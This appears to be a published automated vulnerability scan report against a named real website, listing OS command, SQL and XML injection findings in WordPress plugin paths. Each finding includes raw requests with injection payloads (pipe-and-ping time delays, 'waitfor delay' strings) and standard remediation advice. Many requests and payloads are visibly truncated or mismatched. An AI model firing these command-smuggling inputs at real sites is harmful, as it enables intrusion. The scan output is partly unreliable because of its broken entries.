Potential, OS Command Injection, DORK, GHDB, ligattsecurity.com
Report generated at Sat Sep 01 08:32:42 EDT 2012.International in scope and free for public use
XSS.Cx is a Crawler and Injection Reporting Tool
There are 4 instances of this issue:
- /wp-content/plugins
/nextgen-gallery/js /jquery.cycle.all.min.js [REST URL parameter 5] - /wp-content/plugins/seo
-pressor/templates/css /styles.css [REST URL parameter 2] - /wp-content/plugins
/superslider/plugin-data /superslider/ssBase/blue /accordion.css [REST URL parameter 3] - /wp-content/plugins/wp
-prettyphoto/js/jquery .prettyPhoto.js [REST URL parameter 4]
Issue background
Operating system command injection vulnerabilities arise when an application incorporates user-controllable data into a command that is processed by a shell command interpreter. If the user data is not strictly validated, an attacker can use shell metacharacters to modify the command to be executed, and inject arbitrary further commands that will be executed by the server.OS command injection vulnerabilities are usually very serious and may lead to compromise of the server hosting the application, or of the application's own data and functionality. The exact potential for exploitation may depend upon the security context in which the command is executed, and the privileges which this context has regarding sensitive resources on the server.
Issue remediation
If possible, applications should avoid incorporating user-controllable data into operating system commands. In almost every situation, there are safer alternative methods of performing server-level tasks, which cannot be manipulated to perform additional commands than the one intended.If it is considered unavoidable to incorporate user-supplied data into operating system commands, the following two layers of defence should be used to prevent attacks:
- The user data should be strictly validated. Ideally, a whitelist of specific accepted values should be used. Otherwise, only short alphanumeric strings should be accepted. Input containing any other data, including any conceivable shell metacharacter or whitespace, should be rejected.
- The application should use command APIs that launch a specific process via its name and command-line parameters, rather than passing a command string to a shell interpreter that supports command chaining and redirection. For example, the Java API Runtime.exec and the ASP.NET API Process.Start do not support shell metacharacters. This defence can mitigate the impact of an attack even in the event that an attacker circumvents the input validation defences.
1.1. http://www.ligattsecurity.com/wp-content/plugins/nextgen-gallery/js/jquery.cycle.all.min.js [REST URL parameter 5] next
Summary
Severity: | High |
Confidence: | Firm |
Host: | http://www.ligattsecurity |
Path: | /wp-content/plugins |
Issue detail
The REST URL parameter 5 appears to be vulnerable to OS command injection attacks. It is possible to use the pipe character (|) to inject arbitrary OS commands. The command output does not appear to be returned in the application's responses, however it is possible to inject time delay commands to verify the existence of the vulnerability.The payload |ping%20-n%2020%20127.0.0
Request
GET /wp-content/plugins Host: www.ligattsecurity.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: Apache=173.193.214.243 |
Response
HTTP/1.1 404 Not Found Date: Sat, 23 Apr 2011 09:23:48 GMT Server: Apache/2.2.9 (Fedora) Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Pragma: no-cache X-Pingback: http://www.ligattsecurity Last-Modified: Sat, 23 Apr 2011 09:24:40 GMT Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 27852 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> <t ...[SNIP]... |
1.2. http://www.ligattsecurity.com/wp-content/plugins/seo-pressor/templates/css/styles.css [REST URL parameter 2] previous next
Summary
Severity: | High |
Confidence: | Firm |
Host: | http://www.ligattsecurity |
Path: | /wp-content/plugins/seo |
Issue detail
The REST URL parameter 2 appears to be vulnerable to OS command injection attacks. It is possible to use the pipe character (|) to inject arbitrary OS commands. The command output does not appear to be returned in the application's responses, however it is possible to inject time delay commands to verify the existence of the vulnerability.The payload |ping%20-c%2020%20127.0.0
Request
GET /wp-content/plugins|ping%20-c%2020%20127.0.0 Host: www.ligattsecurity.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: Apache=173.193.214.243 |
Response
HTTP/1.1 404 Not Found Date: Sat, 23 Apr 2011 08:29:29 GMT Server: Apache/2.2.9 (Fedora) Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Pragma: no-cache X-Pingback: http://www.ligattsecurity Last-Modified: Sat, 23 Apr 2011 08:30:31 GMT Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 27846 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> <t ...[SNIP]... |
1.3. http://www.ligattsecurity.com/wp-content/plugins/superslider/plugin-data/superslider/ssBase/blue/accordion.css [REST URL parameter 3] previous next
Summary
Severity: | High |
Confidence: | Firm |
Host: | http://www.ligattsecurity |
Path: | /wp-content/plugins |
Issue detail
The REST URL parameter 3 appears to be vulnerable to OS command injection attacks. It is possible to use the pipe character (|) to inject arbitrary OS commands. The command output does not appear to be returned in the application's responses, however it is possible to inject time delay commands to verify the existence of the vulnerability.The payload |ping%20-n%2020%20127.0.0
Request
GET /wp-content/plugins Host: www.ligattsecurity.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: Apache=173.193.214.243 |
Response
HTTP/1.1 404 Not Found Date: Sat, 23 Apr 2011 08:24:53 GMT Server: Apache/2.2.9 (Fedora) Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Pragma: no-cache X-Pingback: http://www.ligattsecurity Last-Modified: Sat, 23 Apr 2011 08:25:49 GMT Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 27871 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> <t ...[SNIP]... |
1.4. http://www.ligattsecurity.com/wp-content/plugins/wp-prettyphoto/js/jquery.prettyPhoto.js [REST URL parameter 4] previous next
Summary
Severity: | High |
Confidence: | Firm |
Host: | http://www.ligattsecurity |
Path: | /wp-content/plugins/wp |
Issue detail
The REST URL parameter 4 appears to be vulnerable to OS command injection attacks. It is possible to use the ampersand character (&) to inject arbitrary OS commands. The command output does not appear to be returned in the application's responses, however it is possible to inject time delay commands to verify the existence of the vulnerability.The payload %26ping%20-n%2020%20127.0
Request
GET /wp-content/plugins/wp Host: www.ligattsecurity.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: Apache=173.193.214.243 |
Response
HTTP/1.1 404 Not Found Date: Sat, 23 Apr 2011 09:06:43 GMT Server: Apache/2.2.9 (Fedora) Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Pragma: no-cache X-Pingback: http://www.ligattsecurity Last-Modified: Sat, 23 Apr 2011 09:07:26 GMT Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 27851 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> <t ...[SNIP]... |
2. SQL injection previous next
There are 5 instances of this issue:
- /wp-content/plugins/wp
-polls/polls-css.css [REST URL parameter 1] - /wp-content/plugins/wp
-polls/polls-css.css [REST URL parameter 2] - /wp-content/plugins/wp
-prettyphoto/js/jquery .prettyPhoto.js [REST URL parameter 2] - /wp-content/themes/elite
-force/js/DD_belatedPNG_0 .0.8a-min.js [REST URL parameter 2] - /wp-includes/js/swfobject
.js [REST URL parameter 1]
Issue background
SQL injection vulnerabilities arise when user-controllable data is incorporated into database SQL queries in an unsafe manner. An attacker can supply crafted input to break out of the data context in which their input appears and interfere with the structure of the surrounding query.Various attacks can be delivered via SQL injection, including reading or modifying critical application data, interfering with application logic, escalating privileges within the database and executing operating system commands.
Issue remediation
The most effective way to prevent SQL injection attacks is to use parameterised queries (also known as prepared statements) for all database access. This method uses two steps to incorporate potentially tainted data into SQL queries: first, the application specifies the structure of the query, leaving placeholders for each item of user input; second, the application specifies the contents of each placeholder. Because the structure of the query has already defined in the first step, it is not possible for malformed data in the second step to interfere with the query structure. You should review the documentation for your database and application platform to determine the appropriate APIs which you can use to perform parameterised queries. It is strongly recommended that you parameterise every variable data item that is incorporated into database queries, even if it is not obviously tainted, to prevent oversights occurring and avoid vulnerabilities being introduced by changes elsewhere within the code base of the application.You should be aware that some commonly employed and recommended mitigations for SQL injection vulnerabilities are not always effective:
- One common defence is to double up any single quotation marks appearing within user input before incorporating that input into a SQL query. This defence is designed to prevent malformed data from terminating the string in which it is inserted. However, if the data being incorporated into queries is numeric, then the defence may fail, because numeric data may not be encapsulated within quotes, in which case only a space is required to break out of the data context and interfere with the query. Further, in second-order SQL injection attacks, data that has been safely escaped when initially inserted into the database is subsequently read from the database and then passed back to it again. Quotation marks that have been doubled up initially will return to their original form when the data is reused, allowing the defence to be bypassed.
- Another often cited defence is to use stored procedures for database access. While stored procedures can provide security benefits, they are not guaranteed to prevent SQL injection attacks. The same kinds of vulnerabilities that arise within standard dynamic SQL queries can arise if any SQL is dynamically constructed within stored procedures. Further, even if the procedure is sound, SQL injection can arise if the procedure is invoked in an unsafe manner using user-controllable data.
2.1. http://www.ligattsecurity.com/wp-content/plugins/wp-polls/polls-css.css [REST URL parameter 1] previous next
Summary
Severity: | High |
Confidence: | Certain |
Host: | http://www.ligattsecurity |
Path: | /wp-content/plugins/wp |
Issue detail
The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. The payload ',0,0)waitfor%20delay'0The database appears to be Microsoft SQL Server.
Request
GET /wp-content',0,0)waitfor%20delay'0 Host: www.ligattsecurity.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: Apache=173.193.214.243 |
Response
HTTP/1.1 404 Not Found Date: Sat, 23 Apr 2011 07:50:56 GMT Server: Apache/2.2.9 (Fedora) Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Pragma: no-cache X-Pingback: http://www.ligattsecurity Last-Modified: Sat, 23 Apr 2011 07:51:20 GMT Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 27837 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> <t ...[SNIP]... |
2.2. http://www.ligattsecurity.com/wp-content/plugins/wp-polls/polls-css.css [REST URL parameter 2] previous next
Summary
Severity: | High |
Confidence: | Certain |
Host: | http://www.ligattsecurity |
Path: | /wp-content/plugins/wp |
Issue detail
The REST URL parameter 2 appears to be vulnerable to SQL injection attacks. The payload ',0,0)waitfor%20delay'0The database appears to be Microsoft SQL Server.
Request
GET /wp-content/plugins',0,0)waitfor%20delay'0 Host: www.ligattsecurity.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: Apache=173.193.214.243 |
Response
HTTP/1.1 404 Not Found Date: Sat, 23 Apr 2011 08:15:55 GMT Server: Apache/2.2.9 (Fedora) Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Pragma: no-cache X-Pingback: http://www.ligattsecurity Last-Modified: Sat, 23 Apr 2011 08:16:17 GMT Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 27837 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> <t ...[SNIP]... |
2.3. http://www.ligattsecurity.com/wp-content/plugins/wp-prettyphoto/js/jquery.prettyPhoto.js [REST URL parameter 2] previous next
Summary
Severity: | High |
Confidence: | Certain |
Host: | http://www.ligattsecurity |
Path: | /wp-content/plugins/wp |
Issue detail
The REST URL parameter 2 appears to be vulnerable to SQL injection attacks. The payload ',0,0,0)waitfor%20delay'0The database appears to be Microsoft SQL Server.
Request
GET /wp-content/plugins',0,0,0)waitfor%20delay'0 Host: www.ligattsecurity.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: Apache=173.193.214.243 |
Response
HTTP/1.1 404 Not Found Date: Sat, 23 Apr 2011 08:10:24 GMT Server: Apache/2.2.9 (Fedora) Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Pragma: no-cache X-Pingback: http://www.ligattsecurity Last-Modified: Sat, 23 Apr 2011 08:11:03 GMT Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 27856 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> <t ...[SNIP]... |
2.4. http://www.ligattsecurity.com/wp-content/themes/elite-force/js/DD_belatedPNG_0.0.8a-min.js [REST URL parameter 2] previous next
Summary
Severity: | High |
Confidence: | Certain |
Host: | http://www.ligattsecurity |
Path: | /wp-content/themes/elite |
Issue detail
The REST URL parameter 2 appears to be vulnerable to SQL injection attacks. The payload ',0)waitfor%20delay'0%3a0The database appears to be Microsoft SQL Server.
Request
GET /wp-content/themes',0)waitfor%20delay'0%3a0 Host: www.ligattsecurity.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: Apache=173.193.214.243 |
Response
HTTP/1.1 404 Not Found Date: Sat, 23 Apr 2011 07:57:33 GMT Server: Apache/2.2.9 (Fedora) Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Pragma: no-cache X-Pingback: http://www.ligattsecurity Last-Modified: Sat, 23 Apr 2011 07:58:05 GMT Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 27854 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> <t ...[SNIP]... |
2.5. http://www.ligattsecurity.com/wp-includes/js/swfobject.js [REST URL parameter 1] previous next
Summary
Severity: | High |
Confidence: | Certain |
Host: | http://www.ligattsecurity |
Path: | /wp-includes/js/swfobject |
Issue detail
The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. The payload ',0,0,0)waitfor%20delay'0The database appears to be Microsoft SQL Server.
Request
GET /wp-includes',0,0,0)waitfor%20delay'0 Host: www.ligattsecurity.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: Apache=173.193.214.243 |
Response
HTTP/1.1 404 Not Found Date: Sat, 23 Apr 2011 09:27:42 GMT Server: Apache/2.2.9 (Fedora) Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Pragma: no-cache X-Pingback: http://www.ligattsecurity Last-Modified: Sat, 23 Apr 2011 09:28:01 GMT Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 27825 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> <t ...[SNIP]... |
3. XML injection previous next
There are 94 instances of this issue:
- /wp-content/plugins
/contact-form-7/styles .css [REST URL parameter 1] - /wp-content/plugins
/contact-form-7/styles .css [REST URL parameter 2] - /wp-content/plugins
/contact-form-7/styles .css [REST URL parameter 3] - /wp-content/plugins
/contact-form-7/styles .css [REST URL parameter 4] - /wp-content/plugins
/nextgen-gallery/css /nggallery.css [REST URL parameter 1] - /wp-content/plugins
/nextgen-gallery/css /nggallery.css [REST URL parameter 2] - /wp-content/plugins
/nextgen-gallery/css /nggallery.css [REST URL parameter 3] - /wp-content/plugins
/nextgen-gallery/css /nggallery.css [REST URL parameter 4] - /wp-content/plugins
/nextgen-gallery/css /nggallery.css [REST URL parameter 5] - /wp-content/plugins
/nextgen-gallery/js /jquery.cycle.all.min.js [REST URL parameter 1] - /wp-content/plugins
/nextgen-gallery/js /jquery.cycle.all.min.js [REST URL parameter 2] - /wp-content/plugins
/nextgen-gallery/js /jquery.cycle.all.min.js [REST URL parameter 3] - /wp-content/plugins
/nextgen-gallery/js /jquery.cycle.all.min.js [REST URL parameter 4] - /wp-content/plugins
/nextgen-gallery/js /jquery.cycle.all.min.js [REST URL parameter 5] - /wp-content/plugins
/nextgen-gallery/js/ngg .slideshow.min.js [REST URL parameter 1] - /wp-content/plugins
/nextgen-gallery/js/ngg .slideshow.min.js [REST URL parameter 2] - /wp-content/plugins
/nextgen-gallery/js/ngg .slideshow.min.js [REST URL parameter 3] - /wp-content/plugins
/nextgen-gallery/js/ngg .slideshow.min.js [REST URL parameter 4] - /wp-content/plugins
/nextgen-gallery/js/ngg .slideshow.min.js [REST URL parameter 5] - /wp-content/plugins/seo
-pressor/templates/css /styles.css [REST URL parameter 1] - /wp-content/plugins/seo
-pressor/templates/css /styles.css [REST URL parameter 2] - /wp-content/plugins/seo
-pressor/templates/css /styles.css [REST URL parameter 3] - /wp-content/plugins/seo
-pressor/templates/css /styles.css [REST URL parameter 4] - /wp-content/plugins/si
-captcha-for-wordpress /captcha-secureimage/si _captcha.js [REST URL parameter 1] - /wp-content/plugins
/superslider/js/mootools -1.2.3-core-yc.js [REST URL parameter 1] - /wp-content/plugins
/superslider/js/mootools -1.2.3-core-yc.js [REST URL parameter 2] - /wp-content/plugins
/superslider/js/mootools -1.2.3-core-yc.js [REST URL parameter 3] - /wp-content/plugins
/superslider/js/mootools -1.2.3-core-yc.js [REST URL parameter 4] - /wp-content/plugins
/superslider/js/mootools -1.2.3-core-yc.js [REST URL parameter 5] - /wp-content/plugins
/superslider/js/mootools -1.2.3.1-more.js [REST URL parameter 1] - /wp-content/plugins
/superslider/js/mootools -1.2.3.1-more.js [REST URL parameter 2] - /wp-content/plugins
/superslider/js/mootools -1.2.3.1-more.js [REST URL parameter 3] - /wp-content/plugins
/superslider/js/mootools -1.2.3.1-more.js [REST URL parameter 4] - /wp-content/plugins
/superslider/js/mootools -1.2.3.1-more.js [REST URL parameter 5] - /wp-content/plugins
/superslider/plugin-data /superslider/ssBase/blue /accordion.css [REST URL parameter 1] - /wp-content/plugins
/superslider/plugin-data /superslider/ssBase/blue /accordion.css [REST URL parameter 2] - /wp-content/plugins
/superslider/plugin-data /superslider/ssBase/blue /accordion.css [REST URL parameter 3] - /wp-content/plugins
/superslider/plugin-data /superslider/ssBase/blue /accordion.css [REST URL parameter 4] - /wp-content/plugins
/superslider/plugin-data /superslider/ssBase/blue /accordion.css [REST URL parameter 5] - /wp-content/plugins
/superslider/plugin-data /superslider/ssBase/blue /scroll.css [REST URL parameter 1] - /wp-content/plugins
/superslider/plugin-data /superslider/ssBase/blue /scroll.css [REST URL parameter 2] - /wp-content/plugins
/superslider/plugin-data /superslider/ssBase/blue /scroll.css [REST URL parameter 3] - /wp-content/plugins
/superslider/plugin-data /superslider/ssBase/blue /scroll.css [REST URL parameter 4] - /wp-content/plugins
/superslider/plugin-data /superslider/ssBase/blue /scroll.css [REST URL parameter 5] - /wp-content/plugins
/superslider/plugin-data /superslider/ssBase/blue /scroll.css [REST URL parameter 6] - /wp-content/plugins
/superslider/plugin-data /superslider/ssBase/blue /tooltips.css [REST URL parameter 1] - /wp-content/plugins
/superslider/plugin-data /superslider/ssBase/blue /tooltips.css [REST URL parameter 2] - /wp-content/plugins
/superslider/plugin-data /superslider/ssBase/blue /tooltips.css [REST URL parameter 3] - /wp-content/plugins
/superslider/plugin-data /superslider/ssBase/blue /tooltips.css [REST URL parameter 4] - /wp-content/plugins
/superslider/plugin-data /superslider/ssBase/blue /tooltips.css [REST URL parameter 5] - /wp-content/plugins
/superslider/plugin-data /superslider/ssBase/blue /tooltips.css [REST URL parameter 6] - /wp-content/plugins/wp
-downloadmanager/download -css.css [REST URL parameter 1] - /wp-content/plugins/wp
-downloadmanager/download -css.css [REST URL parameter 2] - /wp-content/plugins/wp
-downloadmanager/download -css.css [REST URL parameter 3] - /wp-content/plugins/wp
-downloadmanager/download -css.css [REST URL parameter 4] - /wp-content/plugins/wp
-mailinglist/css/wp -mailinglist.css [REST URL parameter 1] - /wp-content/plugins/wp
-mailinglist/css/wp -mailinglist.css [REST URL parameter 2] - /wp-content/plugins/wp
-mailinglist/css/wp -mailinglist.css [REST URL parameter 3] - /wp-content/plugins/wp
-mailinglist/css/wp -mailinglist.css [REST URL parameter 4] - /wp-content/plugins/wp
-mailinglist/js/wp -mailinglist.js [REST URL parameter 1] - /wp-content/plugins/wp
-mailinglist/js/wp -mailinglist.js [REST URL parameter 2] - /wp-content/plugins/wp
-mailinglist/js/wp -mailinglist.js [REST URL parameter 3] - /wp-content/plugins/wp
-mailinglist/js/wp -mailinglist.js [REST URL parameter 4] - /wp-content/plugins/wp
-mailinglist/js/wp -mailinglist.js [REST URL parameter 5] - /wp-content/plugins/wp
-polls/polls-css.css [REST URL parameter 1] - /wp-content/plugins/wp
-polls/polls-css.css [REST URL parameter 2] - /wp-content/plugins/wp
-polls/polls-css.css [REST URL parameter 3] - /wp-content/plugins/wp
-polls/polls-css.css [REST URL parameter 4] - /wp-content/plugins/wp
-prettyphoto/css /prettyPhoto.css [REST URL parameter 1] - /wp-content/plugins/wp
-prettyphoto/css /prettyPhoto.css [REST URL parameter 2] - /wp-content/plugins/wp
-prettyphoto/css /prettyPhoto.css [REST URL parameter 3] - /wp-content/plugins/wp
-prettyphoto/css /prettyPhoto.css [REST URL parameter 4] - /wp-content/plugins/wp
-prettyphoto/css /prettyPhoto.css [REST URL parameter 5] - /wp-content/plugins/wp
-prettyphoto/js/jquery .prettyPhoto.js [REST URL parameter 1] - /wp-content/plugins/wp
-prettyphoto/js/jquery .prettyPhoto.js [REST URL parameter 2] - /wp-content/plugins/wp
-prettyphoto/js/jquery .prettyPhoto.js [REST URL parameter 3] - /wp-content/plugins/wp
-prettyphoto/js/jquery .prettyPhoto.js [REST URL parameter 4] - /wp-content/themes/elite
-force/js/DD_belatedPNG_0 .0.8a-min.js [REST URL parameter 1] - /wp-content/themes/elite
-force/js/DD_belatedPNG_0 .0.8a-min.js [REST URL parameter 2] - /wp-content/themes/elite
-force/js/DD_belatedPNG_0 .0.8a-min.js [REST URL parameter 3] - /wp-content/themes/elite
-force/js/DD_belatedPNG_0 .0.8a-min.js [REST URL parameter 4] - /wp-content/themes/elite
-force/js/DD_belatedPNG_0 .0.8a-min.js [REST URL parameter 5] - /wp-content/themes/elite
-force/js/custom.js [REST URL parameter 1] - /wp-content/themes/elite
-force/js/custom.js [REST URL parameter 2] - /wp-content/themes/elite
-force/js/custom.js [REST URL parameter 3] - /wp-content/themes/elite
-force/js/custom.js [REST URL parameter 4] - /wp-content/themes/elite
-force/js/custom.js [REST URL parameter 5] - /wp-content/themes/elite
-force/js/jquery.js [REST URL parameter 1] - /wp-content/themes/elite
-force/js/jquery.js [REST URL parameter 2] - /wp-content/themes/elite
-force/js/jquery.js [REST URL parameter 3] - /wp-content/themes/elite
-force/js/jquery.js [REST URL parameter 4] - /wp-content/themes/elite
-force/js/jquery.js [REST URL parameter 5] - /wp-content/uploads
/shadowbox-js/ed1004 eebc5bab68f0d54754e1 41ca1a.js [REST URL parameter 1] - /wp-includes/js/swfobject
.js [REST URL parameter 1]
Issue background
XML or SOAP injection vulnerabilities arise when user input is inserted into a server-side XML document or SOAP message in an unsafe way. It may be possible to use XML metacharacters to modify the structure of the resulting XML. Depending on the function in which the XML is used, it may be possible to interfere with the application's logic, to perform unauthorised actions or access sensitive data.This kind of vulnerability can be difficult to detect and exploit remotely; you should review the application's response, and the purpose which the relevant input performs within the application's functionality, to determine whether it is indeed vulnerable.
Issue remediation
The application should validate or sanitise user input before incorporating it into an XML document or SOAP message. It may be possible to block any input containing XML metacharacters such as < and >. Alternatively, these characters can be replaced with the corresponding entities: < and >.3.1. http://www.ligattsecurity.com/wp-content/plugins/contact-form-7/styles.css [REST URL parameter 1] previous next
Summary
Severity: | Medium |
Confidence: | Tentative |
Host: | http://www.ligattsecurity |
Path: | /wp-content/plugins |
Issue detail
The REST URL parameter 1 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 1. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.Request
GET /wp-content]]>>/plugins/contact-form-7 Host: www.ligattsecurity.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: Apache=173.193.214.243 |
Response
HTTP/1.1 404 Not Found Date: Sat, 23 Apr 2011 08:13:13 GMT Server: Apache/2.2.9 (Fedora) Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Pragma: no-cache X-Pingback: http://www.ligattsecurity Last-Modified: Sat, 23 Apr 2011 08:13:28 GMT Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 27815 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> <t ...[SNIP]... <script type="text/javascript"> var flashvars = {}; flashvars.xml = "http://www.ligattse var attributes = {}; attributes.wmode = "transparent"; attributes.id = "slider"; swfobject.embedSWF("htt ...[SNIP]... |
3.2. http://www.ligattsecurity.com/wp-content/plugins/contact-form-7/styles.css [REST URL parameter 2] previous next
Summary
Severity: | Medium |
Confidence: | Tentative |
Host: | http://www.ligattsecurity |
Path: | /wp-content/plugins |
Issue detail
The REST URL parameter 2 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 2. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.Request
GET /wp-content/plugins]]>>/contact-form-7/styles Host: www.ligattsecurity.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: Apache=173.193.214.243 |
Response
HTTP/1.1 404 Not Found Date: Sat, 23 Apr 2011 08:35:20 GMT Server: Apache/2.2.9 (Fedora) Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Pragma: no-cache X-Pingback: http://www.ligattsecurity Last-Modified: Sat, 23 Apr 2011 08:35:58 GMT Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 27815 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> <t ...[SNIP]... <script type="text/javascript"> var flashvars = {}; flashvars.xml = "http://www.ligattse var attributes = {}; attributes.wmode = "transparent"; attributes.id = "slider"; swfobject.embedSWF("htt ...[SNIP]... |
3.3. http://www.ligattsecurity.com/wp-content/plugins/contact-form-7/styles.css [REST URL parameter 3] previous next
Summary
Severity: | Medium |
Confidence: | Tentative |
Host: | http://www.ligattsecurity |
Path: | /wp-content/plugins |
Issue detail
The REST URL parameter 3 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 3. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.Request
GET /wp-content/plugins Host: www.ligattsecurity.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: Apache=173.193.214.243 |
Response
HTTP/1.1 404 Not Found Date: Sat, 23 Apr 2011 09:03:39 GMT Server: Apache/2.2.9 (Fedora) Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Pragma: no-cache X-Pingback: http://www.ligattsecurity Last-Modified: Sat, 23 Apr 2011 09:03:56 GMT Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 27815 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> <t ...[SNIP]... <script type="text/javascript"> var flashvars = {}; flashvars.xml = "http://www.ligattse var attributes = {}; attributes.wmode = "transparent"; attributes.id = "slider"; swfobject.embedSWF("htt ...[SNIP]... |
3.4. http://www.ligattsecurity.com/wp-content/plugins/contact-form-7/styles.css [REST URL parameter 4] previous next
Summary
Severity: | Medium |
Confidence: | Tentative |
Host: | http://www.ligattsecurity |
Path: | /wp-content/plugins |
Issue detail
The REST URL parameter 4 appears to be vulnerable to XML injection. The payload ]]>> was appended to the value of the REST URL parameter 4. The application's response indicated that this input may have caused an error within a server-side XML or SOAP parser, suggesting that the input has been inserted into an XML document or SOAP message without proper sanitisation.Request
GET /wp-content/plugins Host: www.ligattsecurity.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: Apache=173.193.214.243 |
Response
HTTP/1.1 404 Not Found Date: Sat, 23 Apr 2011 09:37:10 GMT Server: Apache/2.2.9 (Fedora) Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Pragma: no-cache X-Pingback: http://www.ligattsecurity Last-Modified: Sat, 23 Apr 2011 09:37:23 GMT Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 27815 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> <t ...[SNIP]... <script type="text/javascript"> var flashvars = {}; flashvars.xml = "http://www.ligattse var attributes = {}; attributes.wmode = "transparent"; attributes.id = "slider"; swfobject.embedSWF("htt ...[SNIP]... |
3.5. http://www.ligattsecurity.com/wp-content/plugins/nextgen-gallery/css/nggallery.css [REST URL parameter 1] previous next
Summary
Severity: | Medium |
Confidence: | Tentative |
Host: | http://www.ligattsecurity |
Path: | /wp-content/plugins |
Issue detail
